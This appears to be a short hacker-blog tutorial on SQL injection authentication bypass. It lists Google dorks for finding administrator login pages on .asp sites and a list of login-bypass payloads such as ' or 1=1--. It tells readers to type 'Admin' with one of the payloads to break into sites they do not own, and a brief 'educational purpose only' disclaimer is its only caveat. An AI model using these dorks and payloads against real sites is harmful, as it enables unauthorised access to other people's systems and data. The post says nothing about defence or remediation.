Basic sql injection Full Tutorials Part 1

Part 1 : Basic sql injection

Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp. First we need 2 find a site, start by opening google.

Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.

here is the best:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

"inurl:admin_login.asp"

"inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"

Now what to do once we get to our site. The site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :

password :

so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections.

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

Username: Admin

password: 'or'1'='1

So click submit and you'r in

NOTE not all sites are vulnerable.

Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.

Comment If you like the tutorials. [Video Tutorials Comming soon]

By Blog Admin with 3 comments